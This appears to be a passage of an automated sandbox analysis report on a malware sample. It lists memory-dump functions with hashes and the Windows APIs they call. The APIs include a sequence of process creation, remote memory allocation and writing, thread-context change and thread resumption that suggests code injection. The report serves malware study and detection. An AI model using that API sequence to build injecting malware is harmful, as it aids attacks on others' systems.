                                                    • Opcode Fuzzy Hash: 6e8ea5e202338e252f12ad7d2750ca3e391f3d71f53233e250bd5ae8440a7906
                                                    • Instruction Fuzzy Hash: 9D61E371E44729CBEB28CF66D8547EDFBB6BF89300F14C1AAD409A6250EB705A85CF41
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2007574800.0000000007290000.00000040.00000800.00020000.00000000.sdmp, Offset: 07290000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7290000_hOe2JrpIAE.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 71aaf283900b535c07d20f14bd605f59e04c3b99864c773ef2898982f69355a3
                                                    • Instruction ID: 4c7de15dd5bf358b716e5f12cc861bd6611e6823205811bdf133d47b70094001
                                                    • Opcode Fuzzy Hash: 71aaf283900b535c07d20f14bd605f59e04c3b99864c773ef2898982f69355a3
                                                    • Instruction Fuzzy Hash: C151D6B4E151199BCB04DFAAD5809AEFBF6FF88310F18D125E418A7355DB309982CBA0

                                                    Control-flow Graph

                                                    APIs
                                                    • GetCurrentProcess.KERNEL32 ref: 013EDDBE
                                                    • GetCurrentThread.KERNEL32 ref: 013EDDFB
                                                    • GetCurrentProcess.KERNEL32 ref: 013EDE38
                                                    • GetCurrentThreadId.KERNEL32 ref: 013EDE91
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2004768882.00000000013E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013E0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_13e0000_hOe2JrpIAE.jbxd
                                                    Similarity
                                                    • API ID: Current$ProcessThread
                                                    • String ID:
                                                    • API String ID: 2063062207-0
                                                    • Opcode ID: 6ff1891b865cd0918345ee3f0595eddea2bd38c95cafbb7e8a5da4886d176111
                                                    • Instruction ID: 19b7d3c72e0bd5b48c45d59cdb6eeb0aa8b95f127eb50d7c7b1e7d6bc8a019f1
                                                    • Opcode Fuzzy Hash: 6ff1891b865cd0918345ee3f0595eddea2bd38c95cafbb7e8a5da4886d176111
                                                    • Instruction Fuzzy Hash: DB5165B090034A8FDB18DFA9D948BAEBFF5BF88318F24845AE409A7290C7355944CB61

                                                    Control-flow Graph

                                                    APIs
                                                    • GetCurrentProcess.KERNEL32 ref: 013EDDBE
                                                    • GetCurrentThread.KERNEL32 ref: 013EDDFB
                                                    • GetCurrentProcess.KERNEL32 ref: 013EDE38
                                                    • GetCurrentThreadId.KERNEL32 ref: 013EDE91
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2004768882.00000000013E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013E0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_13e0000_hOe2JrpIAE.jbxd
                                                    Similarity
                                                    • API ID: Current$ProcessThread
                                                    • String ID:
                                                    • API String ID: 2063062207-0
                                                    • Opcode ID: ef653553bc03db20a959939833f79bc9a2a6d4690f8e2a4bd0cacb5f0a3dacd3
                                                    • Instruction ID: 784b8f8f82676f2ff8a07829856cf919f0686697266577fe98df8d3f1b3b38d9
                                                    • Opcode Fuzzy Hash: ef653553bc03db20a959939833f79bc9a2a6d4690f8e2a4bd0cacb5f0a3dacd3
                                                    • Instruction Fuzzy Hash: FB5155B0900349CFDB18DFA9D948B9EBBF5BF88318F248459E409A7390D7346944CB65

                                                    Control-flow Graph

                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2006803717.00000000055B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 055B0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_55b0000_hOe2JrpIAE.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: $sq$$sq$$sq$$sq
                                                    • API String ID: 0-2855845837
                                                    • Opcode ID: a9d683a637264f2c38ad4a469cf512723a3b6e46442ec880e7b0d049474f52bd
                                                    • Instruction ID: 104b23c26485f9ecbd0a886bcb54d15d447e7ffce5a0d5ea101f24da1dec67b0
                                                    • Opcode Fuzzy Hash: a9d683a637264f2c38ad4a469cf512723a3b6e46442ec880e7b0d049474f52bd
                                                    • Instruction Fuzzy Hash: 3D919274A11228CFDB64DFA8D894B9DBBB2FB49200F1081AAE50DA7345DB309E85DF51

                                                    Control-flow Graph

                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2006803717.00000000055B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 055B0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_55b0000_hOe2JrpIAE.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: Hwq$Hwq
                                                    • API String ID: 0-741242263
                                                    • Opcode ID: 999a7c9edff052c3063a4199145391fe5ad575994b8c2ea1f3c2d3f7e0a0044a
                                                    • Instruction ID: 0816212dd6d1616d01cfa08ecb317e036cad2cf51fa7839c045e5b4a131be271
                                                    • Opcode Fuzzy Hash: 999a7c9edff052c3063a4199145391fe5ad575994b8c2ea1f3c2d3f7e0a0044a
                                                    • Instruction Fuzzy Hash: FB814D74E002198FDF18DFA9C8946EEBBF6BF88310F14852AE405EB354DB749945CBA1

                                                    Control-flow Graph

                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2007574800.0000000007290000.00000040.00000800.00020000.00000000.sdmp, Offset: 07290000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7290000_hOe2JrpIAE.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: Tesq$Tesq
                                                    • API String ID: 0-1365298620
                                                    • Opcode ID: f872647636b0bde7d34288da86029d030832155d6efd469885196cc05fa5aa53
                                                    • Instruction ID: 6853c8aa0d41ab8c7ac773391b86e0c7c43f9643f516b024c9cbf6700c2602b2
                                                    • Opcode Fuzzy Hash: f872647636b0bde7d34288da86029d030832155d6efd469885196cc05fa5aa53
                                                    • Instruction Fuzzy Hash: 4361D5B5E24219CFDF08DFAAC8846ADFBB6BF89300F158029E419AB355DB715905CF50

                                                    Control-flow Graph

                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2006803717.00000000055B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 055B0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_55b0000_hOe2JrpIAE.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: Tesq$Tesq
                                                    • API String ID: 0-1365298620
                                                    • Opcode ID: c42fac18bb238fc923e556bd78fe5f0115f4f4d49432a9f0fd7a71ce7509e380
                                                    • Instruction ID: dd3a277f5e892cbc163be00de8c23ab05451f9ab96d8bd9fca43af848b18420a
                                                    • Opcode Fuzzy Hash: c42fac18bb238fc923e556bd78fe5f0115f4f4d49432a9f0fd7a71ce7509e380
                                                    • Instruction Fuzzy Hash: 9571F674E002488FEB18DFA9D9947DEBBF2BB89300F20912AD509AB388DB705945CF50

                                                    Control-flow Graph

                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2006803717.00000000055B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 055B0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_55b0000_hOe2JrpIAE.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: Tesq$Tesq
                                                    • API String ID: 0-1365298620
                                                    • Opcode ID: ccc23bd4f78fd2558b3a4626b576752b1d69550106a02a6b1caad7d958c6886a
                                                    • Instruction ID: 3e8cec32843966c13c1f1a66934ea3843fccc75245243cd9183ac1263775a19c
                                                    • Opcode Fuzzy Hash: ccc23bd4f78fd2558b3a4626b576752b1d69550106a02a6b1caad7d958c6886a
                                                    • Instruction Fuzzy Hash: CE71E674E002588FDB18DFA9D9547DEBBF2FB89300F20912AD409AB388DB745945CF50

                                                    Control-flow Graph

                                                    APIs
                                                    • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 0725EA1E
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2007539710.0000000007250000.00000040.00000800.00020000.00000000.sdmp, Offset: 07250000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7250000_hOe2JrpIAE.jbxd
                                                    Similarity
                                                    • API ID: CreateProcess
                                                    • String ID:
                                                    • API String ID: 963392458-0
                                                    • Opcode ID: 4ec3b965ed1e92ed28963d3067f73a42bf5519c765a11bde6dc329faa14b9f54
                                                    • Instruction ID: cf8a65e4b29edc835e2dcbd5ccdd694f972a7f1f5585e3e204042760c1371dcd
                                                    • Opcode Fuzzy Hash: 4ec3b965ed1e92ed28963d3067f73a42bf5519c765a11bde6dc329faa14b9f54
                                                    • Instruction Fuzzy Hash: B0916DB1D1021ACFDF20CF68C8457ADBBB6FF44314F1585A9D819AB280DB749A85CF91

                                                    Control-flow Graph (rendered graph not reproduced)
                                                    APIs
                                                    • GetModuleHandleW.KERNELBASE(00000000), ref: 013EBCFE
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2004768882.00000000013E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013E0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_13e0000_hOe2JrpIAE.jbxd
                                                    Similarity
                                                    • API ID: HandleModule
                                                    • String ID:
                                                    • API String ID: 4139908857-0
                                                    • Opcode ID: 14300461fcfeb072b11d723216b8e3baeae319d610cabd8a3a7075a9cba05065
                                                    • Instruction ID: 0c6eeadc59744a08445a779c6c3c4002d26905308f555952973f36838f254e71
                                                    • Opcode Fuzzy Hash: 14300461fcfeb072b11d723216b8e3baeae319d610cabd8a3a7075a9cba05065
                                                    • Instruction Fuzzy Hash: 6F816670A00B568FDB26DF29D44479ABBF1FF88308F04892ED486D7A98D735E845CB91

                                                    Control-flow Graph (rendered graph not reproduced)
                                                    APIs
                                                    • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 02F727C2
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2005324672.0000000002F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F70000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_2f70000_hOe2JrpIAE.jbxd
                                                    Similarity
                                                    • API ID: CreateWindow
                                                    • String ID:
                                                    • API String ID: 716092398-0
                                                    • Opcode ID: bccd55a5744dd83c18843dee570ed4c6fc65cfeb2d3087159b3268545ed5fd72
                                                    • Instruction ID: 4533929ad8ac1b485e840a2b8673a33e23ff75be801c3a2b05b77aeefe587b35
                                                    • Opcode Fuzzy Hash: bccd55a5744dd83c18843dee570ed4c6fc65cfeb2d3087159b3268545ed5fd72
                                                    • Instruction Fuzzy Hash: 5151CEB1D003499FDF14CFA9C984ADEBBB5BF48350F64822AE819AB250D7759885CF90

                                                    Control-flow Graph (rendered graph not reproduced)
                                                    APIs
                                                    • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 02F727C2
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2005324672.0000000002F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F70000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_2f70000_hOe2JrpIAE.jbxd
                                                    Similarity
                                                    • API ID: CreateWindow
                                                    • String ID:
                                                    • API String ID: 716092398-0
                                                    • Opcode ID: 642960a2eb8f2ce17c552ac5ed8be0b234473d7f52f86232c7cceedc709ff7eb
                                                    • Instruction ID: a261512906d56d40d8e63aaecbe3e7a8408746db12c98d6694cfb9c70a85e5e2
                                                    • Opcode Fuzzy Hash: 642960a2eb8f2ce17c552ac5ed8be0b234473d7f52f86232c7cceedc709ff7eb
                                                    • Instruction Fuzzy Hash: 6641CFB1D003499FDF14CF9AC984ADEBBB5FF48350F64812AE819AB250D775A885CF90
                                                    APIs
                                                    • CreateActCtxA.KERNEL32(?), ref: 013E65E1
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2004768882.00000000013E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013E0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_13e0000_hOe2JrpIAE.jbxd
                                                    Similarity
                                                    • API ID: Create
                                                    • String ID:
                                                    • API String ID: 2289755597-0
                                                    • Opcode ID: 6f9f55288f543fa654782aa36af6429e8fb501558d68cf8024c93931999df973
                                                    • Instruction ID: fc2ddca771bb36ff444424cbf914b28671bc159090a2d9adefe6e1ac253c0e92
                                                    • Opcode Fuzzy Hash: 6f9f55288f543fa654782aa36af6429e8fb501558d68cf8024c93931999df973
                                                    • Instruction Fuzzy Hash: F541E0B0C00719CFDB24CFA9C949B9EBBF5BF45314F20806AD408AB295DBB56945CF90
                                                    APIs
                                                    • CallWindowProcW.USER32(?,?,?,?,?), ref: 02F74D41
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2005324672.0000000002F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F70000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_2f70000_hOe2JrpIAE.jbxd
                                                    Similarity
                                                    • API ID: CallProcWindow
                                                    • String ID:
                                                    • API String ID: 2714655100-0
                                                    • Opcode ID: f5dfe653f658264e0959028ddfc9e8ab33f313a40fe6bfae82995366514b4b91
                                                    • Instruction ID: 151e4892f98988d575a0c3c3204744dab0cc6634f94140004617be6ffcd50b68
                                                    • Opcode Fuzzy Hash: f5dfe653f658264e0959028ddfc9e8ab33f313a40fe6bfae82995366514b4b91
                                                    • Instruction Fuzzy Hash: A7411AB5A00205CFDB14CF99C888BAABBF5FF88314F25C45AD559A7321D774A841CFA0
                                                    APIs
                                                    • CreateActCtxA.KERNEL32(?), ref: 013E65E1
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2004768882.00000000013E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013E0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_13e0000_hOe2JrpIAE.jbxd
                                                    Similarity
                                                    • API ID: Create
                                                    • String ID:
                                                    • API String ID: 2289755597-0
                                                    • Opcode ID: d0b748150b3ddc1f2e23e4837a32f2ea0102ec1bf31b2dd1f43884e4ad5aef74
                                                    • Instruction ID: 702e3e6474d328e94c2516367b93d9b6c918ce1404c9896219d9467c0aa7c805
                                                    • Opcode Fuzzy Hash: d0b748150b3ddc1f2e23e4837a32f2ea0102ec1bf31b2dd1f43884e4ad5aef74
                                                    • Instruction Fuzzy Hash: 1441D2B0D0072DCBDB24CFA9C949B9EBBF5BF54304F24806AD408AB255DBB56945CF90
                                                    APIs
                                                    • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 0725E5F0
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2007539710.0000000007250000.00000040.00000800.00020000.00000000.sdmp, Offset: 07250000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7250000_hOe2JrpIAE.jbxd
                                                    Similarity
                                                    • API ID: MemoryProcessWrite
                                                    • String ID:
                                                    • API String ID: 3559483778-0
                                                    • Opcode ID: da32ebbe725d37c0e08609e72ebd6a6abbbb6333c0e4ba1a2335d661bd8526a5
                                                    • Instruction ID: 4b2e2cb29eb02307195e64fdd1a307ab89dc787419986a3c832d60282f8e5475
                                                    • Opcode Fuzzy Hash: da32ebbe725d37c0e08609e72ebd6a6abbbb6333c0e4ba1a2335d661bd8526a5
                                                    • Instruction Fuzzy Hash: 3B212AB1D003599FCB10CFA9C885BDEBBF5FF48310F108429E919A7240D7789544DBA0
                                                    APIs
                                                    • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 013EE00F
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2004768882.00000000013E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013E0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_13e0000_hOe2JrpIAE.jbxd
                                                    Similarity
                                                    • API ID: DuplicateHandle
                                                    • String ID:
                                                    • API String ID: 3793708945-0
                                                    • Opcode ID: 72e56b2b94ea6b4d2e8d6d5476de57cc343de110ca77bfbd1a5cc10f38ed09f7
                                                    • Instruction ID: c12a1157b21e3847b33352b05644df3ce00fb7a2d5a7dd64cfcc2791d90b9c52
                                                    • Opcode Fuzzy Hash: 72e56b2b94ea6b4d2e8d6d5476de57cc343de110ca77bfbd1a5cc10f38ed09f7
                                                    • Instruction Fuzzy Hash: 1221F4B5D003589FDB10CFAAD884ADEBFF4FB48324F24805AE914A7251D375A945CF60
                                                    APIs
                                                    • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 0725E00E
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2007539710.0000000007250000.00000040.00000800.00020000.00000000.sdmp, Offset: 07250000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7250000_hOe2JrpIAE.jbxd
                                                    Similarity
                                                    • API ID: ContextThreadWow64
                                                    • String ID:
                                                    • API String ID: 983334009-0
                                                    • Opcode ID: 534b4aee12b2f089a52633e18012a0bbc11833b777f8b53f5b44d48d0fed0ef9
                                                    • Instruction ID: 8c926683b0810159ac0b875837cd7236cd491a415c9a17f79ef959e932dc155c
                                                    • Opcode Fuzzy Hash: 534b4aee12b2f089a52633e18012a0bbc11833b777f8b53f5b44d48d0fed0ef9
                                                    • Instruction Fuzzy Hash: A52129B1D103098FDB10DFAAC485BEEBBF4EF48324F14842AD559AB240C778A945CFA1
                                                    APIs
                                                    • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0725E6D0
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2007539710.0000000007250000.00000040.00000800.00020000.00000000.sdmp, Offset: 07250000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7250000_hOe2JrpIAE.jbxd
                                                    Similarity
                                                    • API ID: MemoryProcessRead
                                                    • String ID:
                                                    • API String ID: 1726664587-0
                                                    • Opcode ID: fba263e9519336144f206bbe200378eef86fa3895df0c3a530f9ecf2cb157604
                                                    • Instruction ID: 7481b5c768096ca3f6d6cece1938fe6f6611940eb845d63074553868620b64f1
                                                    • Opcode Fuzzy Hash: fba263e9519336144f206bbe200378eef86fa3895df0c3a530f9ecf2cb157604
                                                    • Instruction Fuzzy Hash: 482128B1D003599FCB10DFAAC881ADEBBF5FF48320F50842AE919A7240C7799540DBA0
                                                    APIs
                                                    • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 013EE00F
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2004768882.00000000013E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013E0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_13e0000_hOe2JrpIAE.jbxd
                                                    Similarity
                                                    • API ID: DuplicateHandle
                                                    • String ID:
                                                    • API String ID: 3793708945-0
                                                    • Opcode ID: 77c7e958fd3ab762962af6a07ee0e3255099ec7f5f5759b973c2e44d7bcda4ec
                                                    • Instruction ID: f495f19007dad6f1edd49ff46fe406f43ba9bc38d2e64b70e6ccfea64d38db04
                                                    • Opcode Fuzzy Hash: 77c7e958fd3ab762962af6a07ee0e3255099ec7f5f5759b973c2e44d7bcda4ec
                                                    • Instruction Fuzzy Hash: 0C21E4B59003599FDB10CF9AD984ADEBFF8FB48320F14841AE914A7350D379A944CFA5
                                                    APIs
                                                    • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,013EBD79,00000800,00000000,00000000), ref: 013EBF8A
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2004768882.00000000013E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013E0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_13e0000_hOe2JrpIAE.jbxd
                                                    Similarity
                                                    • API ID: LibraryLoad
                                                    • String ID:
                                                    • API String ID: 1029625771-0
                                                    • Opcode ID: 6700e8f6dee2e4dd31ca64091026a275e23945fa9a3861d71c4e83750fc172bc
                                                    • Instruction ID: b8e39d96547bfffca9a5ce34acaa7fc4c12246deb4d0e795b3c856aeec6adc3e
                                                    • Opcode Fuzzy Hash: 6700e8f6dee2e4dd31ca64091026a275e23945fa9a3861d71c4e83750fc172bc
                                                    • Instruction Fuzzy Hash: A71114B69043198FDB10CF9AD848BDEFBF8EB88324F14842EE519A7240C375A545CFA4
                                                    APIs
                                                    • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,013EBD79,00000800,00000000,00000000), ref: 013EBF8A
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2004768882.00000000013E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013E0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_13e0000_hOe2JrpIAE.jbxd
                                                    Similarity
                                                    • API ID: LibraryLoad
                                                    • String ID:
                                                    • API String ID: 1029625771-0
                                                    • Opcode ID: 454d5e547ac862d73c76ed06d153d71ca6ba852588dc3ed83ae79bb2a9d89ae8
                                                    • Instruction ID: 754dccfd64594df24cd28c2e904e7b4c99bc339b943f7428bc6beb39500af09b
                                                    • Opcode Fuzzy Hash: 454d5e547ac862d73c76ed06d153d71ca6ba852588dc3ed83ae79bb2a9d89ae8
                                                    • Instruction Fuzzy Hash: DA1114B69003498FDB14CFAAD444BDEFBF4EB48314F14842EE559A7240C375A546CFA5
                                                    APIs
                                                    • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0725E50E
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2007539710.0000000007250000.00000040.00000800.00020000.00000000.sdmp, Offset: 07250000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7250000_hOe2JrpIAE.jbxd
                                                    Similarity
                                                    • API ID: AllocVirtual
                                                    • String ID:
                                                    • API String ID: 4275171209-0
                                                    • Opcode ID: b9fc31db0233f908620e4d157b6900b2dd26835d2a32bf95117a5aab0bea3c2b
                                                    • Instruction ID: 6744b20f0263877b33eee0cdc88eb3253e70477ae2eaaf5aacfc82bced860e4a
                                                    • Opcode Fuzzy Hash: b9fc31db0233f908620e4d157b6900b2dd26835d2a32bf95117a5aab0bea3c2b
                                                    • Instruction Fuzzy Hash: 751137B19002499FCB10DFAAC845BDFBFF5EF88320F248819E519AB250C775A540DFA1
                                                    APIs
                                                    • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,013EBD79,00000800,00000000,00000000), ref: 013EBF8A
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2004768882.00000000013E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013E0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_13e0000_hOe2JrpIAE.jbxd
                                                    Similarity
                                                    • API ID: LibraryLoad
                                                    • String ID:
                                                    • API String ID: 1029625771-0
                                                    • Opcode ID: 4e451f8423e4f8a3c75ad84f0ca25834925327fb801c22d0e02be408ef950056
                                                    • Instruction ID: 2e39ccd5cba0c4c27606959bcc33dc3b60a99d071a742ec64c9ba813a98b8d5a
                                                    • Opcode Fuzzy Hash: 4e451f8423e4f8a3c75ad84f0ca25834925327fb801c22d0e02be408ef950056
                                                    • Instruction Fuzzy Hash: 10118E768053459FDB168BA8D804BEAFBF4EF45328F14805BE505E7260C37A994ACFA0
                                                    APIs
                                                    • FindCloseChangeNotification.KERNELBASE(?), ref: 05022C88
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2006739565.0000000005020000.00000040.00000800.00020000.00000000.sdmp, Offset: 05020000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_5020000_hOe2JrpIAE.jbxd
                                                    Similarity
                                                    • API ID: ChangeCloseFindNotification
                                                    • String ID:
                                                    • API String ID: 2591292051-0
                                                    • Opcode ID: ebf8e2b99ea2509e479326c7c53a4665c37604b7bb136f6295b1fd8205552e8f
                                                    • Instruction ID: c97239d238bcf15215445f449a6a59cbfd3711049ed6dbf743151625dc7b7342
                                                    • Opcode Fuzzy Hash: ebf8e2b99ea2509e479326c7c53a4665c37604b7bb136f6295b1fd8205552e8f
                                                    • Instruction Fuzzy Hash: 901155B580035A8FCB10DF9AD585BDEFBF4EB48320F20841AD468A7240C738A545CFA1
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2007539710.0000000007250000.00000040.00000800.00020000.00000000.sdmp, Offset: 07250000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7250000_hOe2JrpIAE.jbxd
                                                    Similarity
                                                    • API ID: ResumeThread
                                                    • String ID:
                                                    • API String ID: 947044025-0
                                                    • Opcode ID: cb0da615ffb8f093ba9d61514646442c5bdbe54954482027ca1a74b369b8cfcd
                                                    • Instruction ID: 1c1b0e7a161771a691f4ffc06a0683f3a961845a5d945be1afd2132c7baafb00
                                                    • Opcode Fuzzy Hash: cb0da615ffb8f093ba9d61514646442c5bdbe54954482027ca1a74b369b8cfcd
                                                    • Instruction Fuzzy Hash: 9B110AB1D003498FDB20DFAAD44579EFBF5EF88324F248419D519A7240C7796944CB95
                                                    APIs
                                                    • PostMessageW.USER32(?,?,?,?), ref: 050216CD
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2006739565.0000000005020000.00000040.00000800.00020000.00000000.sdmp, Offset: 05020000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_5020000_hOe2JrpIAE.jbxd
                                                    Similarity
                                                    • API ID: MessagePost
                                                    • String ID:
                                                    • API String ID: 410705778-0
                                                    • Opcode ID: a36b7c29f8741e5d2a4acfa10f3b71f2ffd539775e38a5ab00e8caa05875bc53
                                                    • Instruction ID: ed1afdcb91b1f9fa887861d51dfbadcaaa57c2f9294f0aa5191d05f64256d134
                                                    • Opcode Fuzzy Hash: a36b7c29f8741e5d2a4acfa10f3b71f2ffd539775e38a5ab00e8caa05875bc53
                                                    • Instruction Fuzzy Hash: 2B11F5B58002599FCB10DF99D889BDEBBF8EB48324F14851AD959A7210C379A944CFA1
                                                    APIs
                                                    • GetModuleHandleW.KERNELBASE(00000000), ref: 013EBCFE
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2004768882.00000000013E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013E0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_13e0000_hOe2JrpIAE.jbxd
                                                    Similarity
                                                    • API ID: HandleModule
                                                    • String ID:
                                                    • API String ID: 4139908857-0
                                                    • Opcode ID: f4dd0084ee3e8880739b3c90b748bc848fc1d188a33363ba937462520acf5d6c
                                                    • Instruction ID: 75a703212be74ead991d59c6045d700f75d0fc9508c484a6355ab6f2b4c5b7ee
                                                    • Opcode Fuzzy Hash: f4dd0084ee3e8880739b3c90b748bc848fc1d188a33363ba937462520acf5d6c
                                                    • Instruction Fuzzy Hash: D0110FB5C0035A8FDB10CF9AD844B9EFBF9AB88224F20842AD419A7250C379A545CFA1
                                                    APIs
                                                    • FindCloseChangeNotification.KERNELBASE(?), ref: 05022C88
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2006739565.0000000005020000.00000040.00000800.00020000.00000000.sdmp, Offset: 05020000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_5020000_hOe2JrpIAE.jbxd
                                                    Similarity
                                                    • API ID: ChangeCloseFindNotification
                                                    • String ID:
                                                    • API String ID: 2591292051-0
                                                    • Opcode ID: 6e147e85432658d6bde2ec1360b83eab0597c21ab9a67d7760f6ad9db002ba4c
                                                    • Instruction ID: 9328673577189694618b8d61fe2ffbc659234cf463c7c7eca118bf61f5b12621
                                                    • Opcode Fuzzy Hash: 6e147e85432658d6bde2ec1360b83eab0597c21ab9a67d7760f6ad9db002ba4c
                                                    • Instruction Fuzzy Hash: 851133B580034A8FCB10DF9AD545BDEBBF4EB48320F20841AD518A7340C338A544CFA5
                                                    APIs
                                                    • PostMessageW.USER32(?,?,?,?), ref: 050216CD
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2006739565.0000000005020000.00000040.00000800.00020000.00000000.sdmp, Offset: 05020000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_5020000_hOe2JrpIAE.jbxd
                                                    Similarity
                                                    • API ID: MessagePost
                                                    • String ID:
                                                    • API String ID: 410705778-0
                                                    • Opcode ID: 24724c336d4cc0d6b6ffa812097f2389129f8e7f0c3c9c19863b81e934ed615d
                                                    • Instruction ID: 0a5759fb6b6409c38771368dde77daf0a5c130565c33f475a6d7b198dba567aa
                                                    • Opcode Fuzzy Hash: 24724c336d4cc0d6b6ffa812097f2389129f8e7f0c3c9c19863b81e934ed615d
                                                    • Instruction Fuzzy Hash: 0A1103B58003499FCB10DF9AD889BDEBBF8FB48320F24841AD518A7200C375A544CFA1
                                                    Strings
                                                    Memory Dump Source
